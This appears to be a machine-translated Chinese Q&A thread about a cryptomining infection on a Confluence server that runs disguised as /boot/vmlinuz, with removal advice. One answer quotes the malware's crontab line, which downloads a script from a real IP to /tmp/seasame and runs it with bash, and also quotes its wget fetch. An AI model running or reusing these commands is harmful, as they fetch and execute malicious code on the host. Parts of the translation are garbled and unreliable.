vmlinuz进程在100％CPU上运行

Question

我正在VPS上运行一个Jira和一个Confluence实例（以及nginx反向代理）。目前，由于某种原因我无法开始融合，我认为这是其他原因造成的。

我已经检查了流程列表：

运行confluence进程的/boot/vmlinuz用户占用了CPU。如果我kill -9，此过程将在几秒钟后再次开始。

重新启动VPS后：

1. Confluence和Jira自动启动。
2. Confluence正确运行了几秒钟，然后导致进程中断。 Jira进程仍在运行。
3. /boot/vmlinuz进程开始。

我已经从自动启动中删除了Confluence，但这没关系。

所以我的问题：

• 此/boot/vmlinuz过程是什么？我没看过（是的，我知道vmlinuz是内核）
• 为什么要一遍又一遍地在100％CPU上运行？
• 我应该怎么做才能恢复正常行为，并且可以启动Confluence？

感谢任何答案

更新

这是由黑客入侵引起的。如果找到/tmp/seasame文件，则表明您的服务器已被感染。它使用cron下载此文件。我已经删除了/tmp文件夹中的文件，杀死了所有进程，为confluence用户禁用了cron，并更新了Confluence。

Answer 1

您的服务器看起来像被黑了。 请仔细查看进程列表。 例如运行ps auxc并查看进程二进制源。

您可以使用rkhunter之类的工具来扫描服务器，但通常，一开始您应该杀死所有作为融合用户吃过的饭菜，扫描服务器/帐户，升级融合（大多数情况下，用户确定攻击源） ，并在您的汇合处寻找其他帐户等。

您是否想查看该过程中的内容，请查看/ proc例如在ls -la /proc/996中。您还将在那里看到源二进制文件。您也可以strace -ff -p 996用午餐来查看正在执行的过程，或者cat /proc/996/exe | strings来查看二进制文件具有的字符串。这可能是僵尸网络部分，矿工等。

Answer 2

我遇到了同样的问题，它被黑了，病毒脚本位于/ tmp，从命令“ top”中找到脚本名称（无意义的字母，“ fcbk6hj”的名称是我的。）并杀死进程（可能是3个进程） ）

根3158 1 0 15:18？ 00:00:01 ./fcbk6hj ./jd8CKgl 根3159 1 0 15:18 00:00:01 ./fcbk6hj ./5CDocHl 根3160 1 0 15:18 00:00:11 ./fcbk6hj ./prot

杀死所有这些并删除/ tmp / prot，并杀死CPU的/ boot / vmlinuz进程。

我发现病毒已将脚本自动下载到/ tmp，我的方法是将mw wgetak改为其他名称。

病毒行为： wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo

发现以下任务是用crontab编写的，只需将其删除即可： * / 5 * * * * / usr / bin / wgetak -q -O / tmp / seasame http://51.38.133.232:80 && bash / tmp / seasame

Answer 3

将其从系统和crontab中删除后，将融合用户添加到dataSeries也许是个好主意（至少目前如此）。

及之后：

/etc/cron.deny

Answer 4

我也同时遇到了同样的问题，也许这是一个融合错误。我只是杀死了融合过程，就可以了。

Answer 5

您发现这是恶意软件-实际上是cryptojacking malware，旨在将您的CPU用作cryptocurrency miner。

您的服务器很可能由于Confluence漏洞而受到威胁（请参阅this reddit post的第一个答案），但是一个人应该知道这不是唯一的传播方式 -强调不够。事实上，尽管我的服务器没有运行Confluence（我什至不知道该软件……），但它也遭到了破坏，{{1}运行了所谓的/boot/vmlinuz进程}}。

此外，请注意，此恶意软件尝试使用root和SSH密钥通过 SSH传播，因此您应该检查从此服务器访问的其他计算机。

最后，reddit帖子链接到该恶意软件的this comprehensive description，值得一读。

注意：不要忘记向IP的ISP滥用电子邮件地址发送报告。